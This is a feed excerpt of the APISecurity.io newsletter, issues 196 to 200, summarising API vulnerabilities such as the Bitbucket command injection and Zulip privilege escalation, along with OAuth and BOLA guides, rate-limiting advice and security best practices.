<p>&#8212; Jim Manico, Founder at <a href="https://manicode.com/" target="_blank" rel="noopener noreferrer">Manicode</a> (<a href="https://twitter.com/manicode" target="_blank" rel="noopener noreferrer">@manicode</a>)</p>
<p>&nbsp;</p>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-7248" src="https://apisecurity.io/wp-content/uploads/2020/09/philippe.jpg" alt="" width="150" height="150" /></p>
<p><cite>&#8220;From my work training and advising developers, I get to meet a lot of different people, and see a lot of different approaches. One key observation is that lots of teams struggle with insanely complex systems and solutions. In such an environment, security becomes difficult and unmanageable. The teams that do well focus hard on keeping things simple, which often requires extra effort to get there. Looking forward, I&#8217;m optimistic about where we&#8217;re going. Increased security awareness and better tool support will hopefully make it possible to build more secure applications. Congrats with the 200th edition!&#8221;</cite></p>
<p>&#8212; Dr. Philippe De Ryck, Founder at <a href="https://pragmaticwebsecurity.com/" target="_blank" rel="noopener noreferrer">Pragmatic Web Security</a> (<a href="https://twitter.com/philippederyck?lang=en" target="_blank" rel="noopener noreferrer">@PhilippeDeRyck</a>)</p>
<p>&nbsp;</p>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-7242" src="https://apisecurity.io/wp-content/uploads/2020/09/kin-lane.jpg" alt="" width="150" height="150" /></p>
<p><cite>&#8220;The state of API security leaves many of us in the industry with a lot of anxiety each day, but with more discussion and sharing about why API security matters we will be able to collectively realize a more stable and secure future &#8212; making the APISecurity.io newsletter THE most important newsletter out there when it comes to the reliability, stability, and trust of our enterprise operations.&#8221;</cite></p>
<p>&#8212; Kin Lane, Chief Evangelist at <a href="https://www.postman.com/" target="_blank" rel="noopener noreferrer">Postman</a> (<a href="https://twitter.com/kinlane" target="_blank" rel="noopener noreferrer">@kinlane</a>)</p>
<p>&nbsp;</p>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-9991" src="https://apisecurity.io/wp-content/uploads/2022/08/Corey_Ball.jpg" alt="" width="150" height="150" /></p>
<p><em>&#8220;One of the final recommendations in the Hacking APIs Workshop was to subscribe to said [APISecurity.io] newsletter for the latest and greatest API security news!&#8221;</em></p>
<p>&#8212; Corey Ball, author of &#8220;<a href="https://www.hackingapis.com/" target="_blank" rel="noopener noreferrer">Hacking APIs</a>&#8221; (<a href="https://twitter.com/hAPI_hacker" target="_blank" rel="noopener noreferrer">@hAPI_hacker</a>)</p>
<p>&nbsp;</p>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-9992" src="https://apisecurity.io/wp-content/uploads/2022/08/Adrian.jpeg" alt="" width="150" height="150" /></p>
<p><cite>&#8220;We think that API security is a very hot topic right now. FORTBRIDGE has had a lot of success in engagements where APIs were involved, as evidence you can check out our research on hacking the Yunmai smartscale which was one of our most popular research articles. And there&#8217;s more API stuff waiting to be published with big vendor names.</cite></p>
<p><cite>We&#8217;ve also noticed that APIs are a great target and tend to be vulnerable in general to more obscure classes of vulnerabilities such as HPP(had great success with this one;)), mass assignment, info leaks etc. As a pentester you have to think a bit outside of OWASP TOP 10 if you really want to be successful at hacking APIs. We think that APIs will continue to be a great target, companies are catching up when it comes to this topic. One thing remains constant though, a combination of proper security tooling &amp; highly skilled pentesters is required to secure APIs.&#8221;</cite></p>
<p>&#8212; Adrian Tiron, Managing Partner at <a href="https://fortbridge.co.uk/" target="_blank" rel="noopener noreferrer">FORTBRIDGE</a> (<a href="https://twitter.com/FORTBRIDGE1" target="_blank" rel="noopener noreferrer">@FORTBRIDGE1)</a></p>
<hr />
<h2>API security news</h2>
<p>In brief this week, we have news of a command injection vulnerability in the Atlassian Bitbucket server, a guide on understanding and exploiting OAuth2, an article on the occurrence of API security incidents, and finally, an article on the top five API security best practices.</p>
<h2>Vulnerability: Command injection vulnerability in Bitbucket server</h2>
<p>The most significant news this week is <a href="https://portswigger.net/daily-swig/critical-command-injection-vulnerability-discovered-in-bitbucket-server-and-data-center" target="_blank" rel="noopener noreferrer">the critical command injection vulnerability in Bitbucket</a> that could allow attackers to execute arbitrary code. The flaw (tracked as CVE-2022-36804) is a command injection vulnerability discovered in multiple API endpoints.</p>
<p>According to the advisory, the affected product is the Bitbucket Server and Data Center (versions released after 6.10.17, and up to 8.3.0). The usual guidance applies — update to the latest version of the software as soon as possible.</p>
<h2>Guide: Understanding and exploiting OAuth2</h2>
<p>OAuth2 is an ever-popular topic with readers, and this week <a href="https://infosecwriteups.com/oauth-2-0-introduction-and-exploitation-part-i-explained-by-hashar-mujahid-262f9c59de6c" target="_blank" rel="noopener noreferrer">we have a great article</a> from Hashar Mujahid covering a gentle introduction to OAuth2, followed by a tutorial on how to exploit poorly implemented instances of it.</p>
<p>If you are interested to learn more, it&#8217;s possible to get hands on and <a href="https://portswigger.net/web-security/oauth/lab-oauth-authentication-bypass-via-oauth-implicit-flow" target="_blank" rel="noopener noreferrer">do the lab exercises yourself</a>, thanks to the good folk at PortSwigger.</p>
<h2>Article: API security incidents occurring monthly</h2>
<p>HelpNet Security has <a href="https://www.helpnetsecurity.com/2022/08/23/api-professionals-priorities/" target="_blank" rel="noopener noreferrer">covered the recent PostMan</a> &#8220;2022 State of the API&#8221; report and included their warning that API security incidents are now occurring at least once a month.</p>
<p>The key findings from the report are:</p>
<ul>
<li>Organizations are now spending the majority of their development efforts on APIs.</li>
<li>API investments to remain strong, despite economic headwinds.</li>
<li>API-first leaders outperform.</li>
<li>Remote work is “very important.”</li>
<li>API security incidents occur monthly at many companies.</li>
</ul>
<p>The report&#8217;s key recommendation was to shift-left with API security &#8211; I couldn&#8217;t agree more.</p>
<h2>Article: Top five API security best practices</h2>
<p>Finally, Traefiklabs has published <a href="https://traefik.io/blog/top-5-api-security-best-practices/" target="_blank" rel="noopener noreferrer">their recommendations for the top five best practices</a>  for protection, resilience, reliability, and scalability of APIs.</p>
<p>Their top recommendations are:</p>
<ul>
<li>Maintain load balancing</li>
<li>Control access to your APIs with authentication and authorization</li>
<li>Protect your data with encryption and TLS/SSL certificates</li>
<li>Don’t forget rate limiting</li>
<li>Maintain solid access logs</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-200-injection-vulnerability-in-bitbucket-oauth2-exploitation-and-200th-issue-prize-giveaways/">Issue 200: Injection vulnerability in BitBucket, OAuth2 exploitation, and 200th issue prize giveaways</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 199: Vulnerability in Zulip server, broken access controls threat to APIs, introduction to BOLA</title>
		<link>https://apisecurity.io/issue-199-vulnerability-in-zulip-server-broken-access-controls-threat-to-apis-introduction-to-bola/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 25 Aug 2022 16:59:14 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9957</guid>

					<description><![CDATA[<p>This week, we have news of a API vulnerability allowing privilege escalation in the team chat tool Zulip. We also have articles from PortSwigger on the threat of broken access controls and injection attacks to APIs, as well as a quick read on Broken Object Level Authorization vulnerabilities. Finally, we feature a guide from the [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-199-vulnerability-in-zulip-server-broken-access-controls-threat-to-apis-introduction-to-bola/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-199-vulnerability-in-zulip-server-broken-access-controls-threat-to-apis-introduction-to-bola/">Issue 199: Vulnerability in Zulip server, broken access controls threat to APIs, introduction to BOLA</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news of a API vulnerability allowing privilege escalation in the team chat tool Zulip. We also have articles from PortSwigger on the threat of broken access controls and injection attacks to APIs, as well as a quick read on Broken Object Level Authorization vulnerabilities. Finally, we feature a guide from the Cloud Security Alliance on API security best practices.</p>
<h2>Vulnerability: Privilege escalation vulnerability in Zulip Server</h2>
<p>Security researchers have revealed details of <a href="https://vuldb.com/?id.204919" target="_blank" rel="noopener noreferrer">a critical privilege escalation vulnerability</a> in the API of Zulip Server. The vulnerability is tracked as <a href="https://vuldb.com/?source_cve.204919" target="_blank" rel="noopener noreferrer">CVE-2022-31168</a> and affects all versions of Zulip Server up to 5.4. Users are recommended to upgrade to version 5.5 immediately.</p>
<p>The researchers discovered that it was possible to craft an API call that grants organization administrator privileges to one of their bots. The root cause of the vulnerability was an incorrect authorization check in Zulip Server.</p>
<p>This is an example of <a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication" target="_blank" rel="noopener noreferrer">API2:2019 — Broken authentication</a>, one of the most prevalent and severe API vulnerabilities.</p>
<h2>Article: Broken access controls threat to APIs</h2>
<p>This week, <a href="https://portswigger.net/daily-swig/api-security-broken-access-controls-injection-attacks-plague-the-enterprise-security-landscape-in-2022" target="_blank" rel="noopener noreferrer">PortSwigger has released an article</a> covering the risk that broken access controls (exactly like in the vulnerability above) pose to APIs.</p>
<p>According to the report, in the first quarter of 2022 as many as 48 API-related vulnerabilities occurred. Of these, 18 were rated as high-risk and 19 as medium severity. The report also highlighted the risk of injection-based attacks on APIs.</p>
<p>The article highlights two high-profile API vulnerabilities from 2022:</p>
<ul>
<li>The first vulnerability is the infamous <em>Log4Shell</em> vulnerability (<a href="https://apisecurity.io/issue-164-log4shell-vulnerability-api-sprawl-an-increasing-threat-api-security-design-best-practices-zero-trust-for-apis/" target="_blank" rel="noopener noreferrer">covered here</a>) enabling attackers to inject a code payload to allow remote code execution (RCE) in the Spring Framework Core module.</li>
<li>The second vulnerability relates to broken authentication in the Veeam backup solution (<a href="https://apisecurity.io/issue-177-vulnerabilities-in-veeam-product-rce-in-parse-server-module-insecure-api-threat-to-mobile-apps/" target="_blank" rel="noopener noreferrer">covered here</a>) which also allowed attackers to execute code remotely.</li>
</ul>
<p>Based on my own research (and <a href="https://42crunch.com/api-breaches-h1-2022-recordings/" target="_blank" rel="noopener noreferrer">featured in a recent webinar</a>), I would suggest that <a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication" target="_blank" rel="noopener noreferrer">API2:2019 — Broken authentication</a> has now risen to be the most prevalent and certainly the most serious API vulnerability.</p>
<h2>Article: Introduction to Broken Object Level Authorization</h2>
<p>Beating broken authentication to the top of the OWASP API Security Top 10 is the equally infamous <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">API1:2019 — Broken object level authorization</a> (BOLA/IDOR) vulnerability. We have frequently featured guides on this troublesome topic, and <a href="https://infosecwriteups.com/lets-learn-api-security-more-about-broken-object-level-authorization-b5fd1d73e0d8" target="_blank" rel="noopener noreferrer">this week we have a great guide</a> for new beginners on the topic of API security.</p>
<p>With BOLA, an endpoint allows a given user access to an object (namely data) that does not actually belong to that user. The root cause of this vulnerability is a failure in the API backend to validate that the requesting client is indeed authorized to access the specified object.</p>
<p>Typically, attackers gain authentication to an API and then attempt to manipulate object identifiers to probe for poor API implementation. As readers of this newsletter know only too well, BOLA is frequently exploited in real-world attacks — a great example is the recent high-profile disclosure on the <a href="https://apisecurity.io/issue-173-coinbase-vulnerability-authn-authz-best-practices-bad-bots-hack-elgato-key-light/" target="_blank" rel="noopener noreferrer">Coinbase trading platform</a>.</p>
<p>The article concludes with their recommendations for defense measures:</p>
<ul>
<li>Always fully implement authorization on all endpoints.</li>
<li>Never trust user input because this is how attackers attempt to manipulate the target object.</li>
<li>Using high entropy (random and unpredictable) user IDs can thwart attackers&#8217; attempts to guess user IDs.</li>
<li>Use a central authorization framework or enforcement point to validate user access to requested resources.</li>
<li>Ensure you test your APIs for BOLA weaknesses.</li>
</ul>
<p>BOLA is easy to defend in theory, but the devil is in the details when it comes to defending in practice.</p>
<h2>Guide: Cloud Security Alliance&#8217;s API security best practices</h2>
<p>The Cloud Security Alliance (CSA) produces many excellent publications on the topic of improving Cloud security. Similarly, they have produced <a href="https://cloudsecurityalliance.org/blog/2021/04/30/a-new-resource-for-api-security-best-practices/" target="_blank" rel="noopener noreferrer">their guide to API security best practices</a>. Whilst their guide overlaps with the OWASP API Security Top 10 recommendations, it too is a useful resource to be bookmarked.</p>
<p>Their first recommendation is to produce a risk evaluation for all APIs to measure the risk they present to your business. This is an excellent recommendation — applying effort to low-risk APIs is a drain on resources and frustrates development and IT teams. Focus on the highest-risk APIs first.</p>
<p>The guide then provides a comprehensive checklist for all stages of the API life cycle:</p>
<ul>
<li>Design</li>
<li>Development</li>
<li>Testing</li>
<li>Implementation</li>
<li>Logging and monitoring</li>
</ul>
<p>The guide lists 39 different checks across these five stages — it&#8217;s definitely worth integrating some of the checks into your API life cycle.</p>
<p>The post <a href="https://apisecurity.io/issue-199-vulnerability-in-zulip-server-broken-access-controls-threat-to-apis-introduction-to-bola/">Issue 199: Vulnerability in Zulip server, broken access controls threat to APIs, introduction to BOLA</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 198: API security certification, API authentication webinar, optimizing API security</title>
		<link>https://apisecurity.io/issue-198-api-security-certification-api-authentication-webinar-optimizing-api-security/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 18 Aug 2022 21:03:38 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9928</guid>

					<description><![CDATA[<p>This week, we have news of the recently released API security training course from Corey Ball and an excellent webinar from Redmonk and FusionAuth. Also, we have an article from TheNewStack on optimizing API security for cloud-native and coverage of a REST API fuzzing tool. Training: API security training with Corey Ball This week&#8217;s biggest [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-198-api-security-certification-api-authentication-webinar-optimizing-api-security/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-198-api-security-certification-api-authentication-webinar-optimizing-api-security/">Issue 198: API security certification, API authentication webinar, optimizing API security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news of the recently released API security training course from Corey Ball and an excellent webinar from Redmonk and FusionAuth. Also, we have an article from TheNewStack on optimizing API security for cloud-native and coverage of a REST API fuzzing tool.</p>
<h2>Training: API security training with Corey Ball</h2>
<p>This week&#8217;s biggest story is the release of Corey Ball&#8217;s API security certified expert training course,<a href="https://university.apisec.ai/apisec-certified-expert" target="_blank" rel="noopener noreferrer"> currently available for free</a>. For those who may have missed it, Corey is the author of the excellent &#8220;<a href="https://nostarch.com/hacking-apis" target="_blank" rel="noopener noreferrer">Hacking APIs</a>&#8221; book, and this course is a great accompaniment to the book. The certification is a three-part course starting with API security (from an offense perspective), then an API security defender, and finally an APIsec certified user.</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-9948" src="https://apisecurity.io/wp-content/uploads/2022/08/Article1.jpg" alt="" width="602" height="264" /></p>
<p>For the API security certified expert, the course outline is:</p>
<ul>
<li>Introduction</li>
<li>Lab Setup</li>
<li>API Reconnaissance</li>
<li>Endpoint Analysis</li>
<li>Scanning APIs</li>
<li>API Authentication Attacks</li>
<li>Exploiting API Authorization</li>
<li>Testing for Improper Assets Management</li>
<li>Mass Assignment</li>
<li>Injection Attacks</li>
<li>Rate Limit Testing</li>
<li>Combining Tools and Techniques</li>
</ul>
<p><a href="https://twitter.com/hAPI_hacker/status/1559905320625131532?s=20&amp;t=jThm6mNXQ3iAEuSfoLhN3Q" target="_blank" rel="noopener noreferrer">According to Corey</a>, the full course will be available by the middle of September. Who&#8217;s gonna be the first to complete the course? Keep me up to date on <a href="https://twitter.com/apisecurityio" target="_blank" rel="noopener noreferrer">@apisecurityio</a> !</p>
<h2>Webinar: API authentication with Redmonk and FusionAuth</h2>
<p><a href="https://redmonk.com/videos/a-redmonk-conversation-api-authentication/" target="_blank" rel="noopener noreferrer">Another popular feature this week</a> was the webinar with Rachel Stephens (RedMonk) and Dan Moore (Head of DevRel, FusionAuth) discussing methods for securing your API.</p>
<p>The webinar covered the OAuth in a lot of details focusing on three areas:</p>
<p><strong>Client Responsibilities:</strong></p>
<ul>
<li>Protect the token</li>
<li>Provide token for resource server requests</li>
<li>Handling token expiration</li>
</ul>
<p><strong>Authorization Server Responsibilities:</strong></p>
<ul>
<li>Protect the user data</li>
<li>Authenticating the user and issuing the token</li>
<li>Follow the standards and implementing grants
<ul>
<li>Authorization Code grant for user based interactions</li>
<li>Client Credentials grant for machine to machine scenarios</li>
</ul>
</li>
<li>Support token validation</li>
</ul>
<p><strong>Resource Server Responsibilities:</strong></p>
<ul>
<li>Validate the token</li>
<li>Validate the claims
<ul>
<li>Expiration time</li>
<li>Issuer</li>
<li>Audience</li>
<li>Business specific claims</li>
</ul>
</li>
</ul>
<p>Moore gave the following recommendations for securing your APIs:</p>
<ul>
<li>Build in API authentication and authorization from the beginning</li>
<li>Avoid the OWASP Top 10 API issues:</li>
<li>Lean towards OAuth
<ul>
<li>Authorization Code grant is for users</li>
<li>Client Credentials grant is for machines</li>
</ul>
</li>
</ul>
<p>A great listen &#8211; strong recommended.</p>
<h2>Article: Optimizing API security for cloud-native</h2>
<p>This week <a href="https://thenewstack.io/5-tips-for-native-developers-to-optimize-api-security/" target="_blank" rel="noopener noreferrer">TheNewStack featured thoughts</a> on how to use cloud-native approaches to improve API security. Their top five recommendations are:</p>
<ul>
<li>Distributed Authorization and Authentication</li>
<li>API Request and Response Handling</li>
<li>Sensitive Data Handling</li>
<li>API Egress Protection</li>
<li>Security Testing and Shifting Left</li>
</ul>
<p>The article concludes on a note of high optimism:</p>
<blockquote class="blockquote"><p><cite>Developers can instead rely on API security tools to enforce distributed access controls, inspect API requests and responses, drive security testing and much more.</cite></p></blockquote>
<p>Ideally, the best security solutions should be unobtrusive and be frictionless for developers.</p>
<h2>Tools: CATS REST API fuzzing tool</h2>
<p>Although it&#8217;s been around for some time, I&#8217;ve only recently looked at the <a href="https://securityonline.info/cats-rest-api-fuzzer-and-negative-testing-tool/" target="_blank" rel="noopener noreferrer">CATS REST API fuzzer and negative testing tool</a>, which can generate, run, and report automatically based on a pre-defined set of 89 fuzzers. According to the project&#8217;s <a href="https://github.com/Endava/cats" target="_blank" rel="noopener noreferrer">GitHub repository</a>, the key features include:</p>
<blockquote class="blockquote"><p><cite>By using a simple and minimal syntax, with a flat learning curve, CATS (Contract Auto-generated Tests for Swagger) enables you to generate thousands of API tests within minutes with no coding effort. All tests are generated, run and reported automatically based on a pre-defined set of 89 Fuzzers. The Fuzzers cover a wide range of input data from fully random large Unicode values to well crafted, context dependant values based on the request data types and constraints. Even more, you can leverage the fact that CATS generates request payloads dynamically and write simple end-to-end functional tests.</cite></p></blockquote>
<p>This tool looks like it holds a lot of promise, and I&#8217;d love to hear from anyone with personal experience.</p>
<p>The post <a href="https://apisecurity.io/issue-198-api-security-certification-api-authentication-webinar-optimizing-api-security/">Issue 198: API security certification, API authentication webinar, optimizing API security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 197: Apps leaking Twitter tokens, parameter smuggling attack in Golang, API catalogs for security</title>
		<link>https://apisecurity.io/issue-197-apps-leaking-twitter-tokens-parameter-smuggling-attack-in-golang-api-catalogs-for-security/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Sun, 14 Aug 2022 19:18:00 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9910</guid>

					<description><![CDATA[<p>This week, we have two vulnerabilities — the first is the revelation that thousands of applications are leaking Twitter access tokens, and the second is a parameter smuggling attack in Golang affecting some well-known Golang-based projects. We also have an article on the benefits of API catalogs in delivering security benefits and, finally, a fascinating [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-197-apps-leaking-twitter-tokens-parameter-smuggling-attack-in-golang-api-catalogs-for-security/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-197-apps-leaking-twitter-tokens-parameter-smuggling-attack-in-golang-api-catalogs-for-security/">Issue 197: Apps leaking Twitter tokens, parameter smuggling attack in Golang, API catalogs for security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have two vulnerabilities — the first is the revelation that thousands of applications are leaking Twitter access tokens, and the second is a parameter smuggling attack in Golang affecting some well-known Golang-based projects. We also have an article on the benefits of API catalogs in delivering security benefits and, finally, a fascinating read on everything you could ever want to know about rate limiting.</p>
<h2>Vulnerability: Thousands of applications leaking Twitter access tokens</h2>
<p><a href="https://www.infosecurity-magazine.com/news/thousands-of-apps-leaking-twitter/" target="_blank" rel="noopener noreferrer">Security researchers at CloudSEK this week disclosed</a> the details of 3,200 mobile applications potentially leaking Twitter API keys. The researchers discovered that in many cases, developers had embedded Twitter API keys within their application binary or manifest, which would allow attackers to extract the keys and use them to access Twitter as if they were the application user.</p>
<p>Security savvy developers have long understood the need to prevent access keys and tokens from being shipped in production images, however less experienced developers may inadvertently ship keys and tokens in the production version. This can be done accidentally or by employing bad practices or build methods. <a href="https://apisecurity.io/issue-155-vulnerability-brewdog-mobile-app-apiclarity-kubecon-api-attacks-open-banking/" target="_blank" rel="noopener noreferrer">We covered a rather epic example</a> of this issue in the mobile application of a microbrewery.</p>
<p>The researchers suggested that these credentials can easily be harvested and used by Twitter bot armies to spread misinformation, run malware campaigns, run spamming campaigns, and automated phishing attacks.</p>
<p>The recommendations for protecting against token and key leakage include:</p>
<ul>
<li>Perform code reviews to identify instances of local, insecure storage.</li>
<li>Ensure that files containing runtime variables in the source code are not shipped with the application.</li>
<li>Use source code scanning tools (such as Semgrep) to scan code in repositories to identify stored credentials.</li>
<li>Ensure you regularly rotate API keys, and have a strategy for key revocation in the event of leakage or disclosure.</li>
</ul>
<h2>Vulnerability: Parameter smuggling attack in Golang</h2>
<p>This week&#8217;s second vulnerability comes from researchers at Oxeye, <a href="https://www.oxeye.io/blog/golang-parameter-smuggling-attack" target="_blank" rel="noopener noreferrer">who have described a security vulnerability </a>in Golang-based applications in detail. The root cause is due to unsafe URL parsing in affected versions of a core Golang library which could allow an attacker to bypass the validation of HTTP request parameters.</p>
<p>The Golang method to parse a URL (<code>parseQuery</code>) changed behavior in the manner in which it processed a semicolon as follows:</p>
<ul>
<li>Prior to version 1.17 the parser would (incorrectly) split the query around the semicolon as if it were a separator.</li>
<li>From version 1.17 the parser would return an error code which, unfortunately, some other Golang modules chose to ignore.</li>
</ul>
<p>The net result is demonstrated in the diagram below — an attacker can supply a query with a semicolon via the <em>user-facing service</em> (using version &gt;= 1.17) and pass this to the <em>backend service</em> (using version &lt; 1.17), which will then incorrectly parse the query. The researchers claim that attackers could be able to smuggle requests containing query parameters that normally would be rejected.</p>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-9923" src="https://apisecurity.io/wp-content/uploads/2022/08/Article2.jpg" alt="" width="769" height="345" /></p>
<p>The researchers reported that a number of well-known projects are potentially vulnerable, including the CNCF Harbor project, the Traefik reverse proxy, and the Skipper router.</p>
<p>The suggested remediation is to upgrade all versions of Golang, use alternate methods to parse queries, to sanitize the URL by stripping extraneous semicolons or using <a href="https://semgrep.dev/playground/s/daniel-abeles:golang-http-parameter-smuggling-assignment" target="_blank" rel="noopener noreferrer">their Semgrep rule</a> to identify vulnerable code.</p>
<p>A really interesting write-up and a great demonstration of the power of Semgrep.</p>
<h2>Article: API catalogs deliver security benefits</h2>
<p><a href="https://thenewstack.io/api_catalogs_deliver_security_benefits/" target="_blank" rel="noopener noreferrer">TheNewStack covered an important element</a> of API security, namely that of API catalogs or inventories. It is impossible to accurately assess risk exposure or develop a strategy for improving API security without understanding what APIs your organization has deployed. The author identifies two reasons why API catalogs are important from a security perspective.</p>
<p>Firstly modern development practices such as CI/CD automation and cloud providers allow developers to deploy an API literally at the touch of a button, often without the knowledge of the security teams. Additionally, since APIs can be changed so frequently, this poses a challenge for the versioning of APIs. This is referred to as the <em>shadow</em> and <em>zombie</em> APIs, respectively. Secondly, because APIs are primarily used to transmit data, they pose the greatest risk of data exposure, creating greater challenges for security and Governance and Risk Control (GRC) teams.</p>
<p>The author suggests three steps toward cataloging APIs:</p>
<ul>
<li>Use a single source of truth to maintain a catalog from a variety of sources and ensure this catalog contains metadata to indicate connectivity, version, visibility, etc.</li>
<li>Use the catalog to auto-generate risk scores based on the metadata to ensure that security teams focus on the highest risk items.</li>
<li>Use the OpenAPI Specification to allow producers and consumers to use a common language and leverage the benefits of automated testing and security scanning.</li>
</ul>
<p>Great advice in general, however building a complete API catalog is a challenging task.</p>
<h2>Article: The right way to rate limit</h2>
<p><a href="https://theauthapi.com/articles/right-ways-of-rate-limiting/" target="_blank" rel="noopener noreferrer">This week&#8217;s final article, from AuthAPI</a>, is a great read on everything you could ever wish to know about API rate-limiting and then some. While rate-limiting appears to be a simple enough concept, there is a lot of devil in the detail to ensure a balance between usability and customer experience versus security and availability is achieved.</p>
<p>The key objectives of rate limiting are as follows:</p>
<ul>
<li><strong>Consistent experience:</strong> ensure that all users have equal access to resources to maintain consistent performance under high load.</li>
<li><strong>Cost management:</strong> API resources cost money, and allowing customers unfettered access to APIs may lead to impacts on your bottom line. Balance the experience against the budget.</li>
<li><strong>Protected services:</strong> from a security perspective, rate-limiting is important to mitigate against malicious actors attempting to brute force an API endpoint.</li>
</ul>
<p>A failure to implement rate-limiting correct can lead to Denial of Service (DoS) or Distributed Denial of Service (DDoS) attacks, cascading failures between dependent APIs, resource starvation, and resource exhaustion.</p>
<p>There are three main strategies for implementing rate-limiting, namely:</p>
<ul>
<li><strong>Hard stop:</strong> once an API limit is reached (too many requests from a user in a fixed time window), the API will return a 429 &#8216;Too many requests&#8217; error, forcing the user to back off for a period. This abrupt halt may be frustrating to users are not expecting this limiting to happen.</li>
<li><strong>Throttled stop:</strong> unlike a hard stop which returns an immediate error, the throttled stop introduces a delay in processing the request. Typically throttled stops are used in combination with hard stops to provide a more nuanced user experience; however, they are often a lot harder to implement.</li>
<li><strong>Billable stops:</strong> the final strategy to rate limiting is to allow the user to opt to pay for API access exceeding their quota. This allows users to determine their own priority — either large request volumes at a price or lower volumes for free. It also allows the provider to generate revenue from high-demand users.</li>
</ul>
<p>Finally, the author suggests some best practices, including:</p>
<ul>
<li><strong>Don&#8217;t be greedy:</strong> avoid charging excessively for API usage that is typical of normal use cases.</li>
<li><strong>Be transparent:</strong> explain your rate-limiting and/or quota policies to avoid unexpected surprises down the line.</li>
<li><strong>Add counters:</strong> adding HTTP headers to the API response allows the client to back off before a limit is incurred.</li>
</ul>
<p>Security teams need to be aware of the negative impacts the injudicial use of rate-limiting may have for users — as ever, it is a balance between security and user experience.</p>
<p>The post <a href="https://apisecurity.io/issue-197-apps-leaking-twitter-tokens-parameter-smuggling-attack-in-golang-api-catalogs-for-security/">Issue 197: Apps leaking Twitter tokens, parameter smuggling attack in Golang, API catalogs for security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 196: Software supply chains, APIs in healthcare, Azure API management baselines</title>
		<link>https://apisecurity.io/issue-196-software-supply-chains-apis-in-healthcare-azure-api-management-baselines/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 03 Aug 2022 17:48:16 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9887</guid>

					<description><![CDATA[<p>This week, we have articles on the importance of API security for the software supply chain, and how API adoption is increasing in the healthcare industry whilst addressing cyber security concerns. We also have new guidance from Microsoft Azure on security baselines for API management, and a free software security course from the Linux Foundation. [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-196-software-supply-chains-apis-in-healthcare-azure-api-management-baselines/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-196-software-supply-chains-apis-in-healthcare-azure-api-management-baselines/">Issue 196: Software supply chains, APIs in healthcare, Azure API management baselines</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have articles on the importance of API security for the software supply chain, and how API adoption is increasing in the healthcare industry whilst addressing cyber security concerns. We also have new guidance from Microsoft Azure on security baselines for API management, and a free software security course from the Linux Foundation.</p>
<h2>Article: API security for the software supply chain</h2>
<p><a href="https://nordicapis.com/api-security-is-paramount-to-protect-the-software-supply-chain/" target="_blank" rel="noopener noreferrer">This week&#8217;s first article</a> is by NordicAPIs, a very timely view of the importance of API security for the software supply chain. Modern software platforms are increasingly composed of discrete elements, rather than developed as a monolith like previously was common. Whilst this approach offers tremendous benefits for shorter development cycles and quicker time to market, it comes at the cost of a more complex supply chain — a vulnerability in a single component can adversely affect the security posture of the overall system. This is something that vehicle manufacturers have well understood for many decades: they have been meticulously tracking the provenance of all components in any given vehicle, allowing a recall in the event of a latent defect.</p>
<p>Now, why is the software supply chain so critically important to security? Because adversaries with malicious intent can focus their attacks on the supply chain, rather than attacking the end product or application directly: it&#8217;s easier to substitute a good component with a malicious component than attack the whole system. Recent years have seen an uptick in the number of attacks based on the software supply chain: just think of the SolarWinds attack, where attackers injected malware into the supply chain, or the British Airways website attack, where attackers were able to inject malicious JavaScript into the website to steal payment details.</p>
<p>So how does API security impact the software supply chain? APIs are a key component in the software supply chain, because they form the integration point between different systems as they are assembled together. Any weakness in an API will negatively impact the security of the overall system. For example, if a 3rd-party API leaks PII information on your product, this ultimately reflects adversely on you, not necessarily that 3rd party. Beware of inadvertently inheriting technical debt and risk.</p>
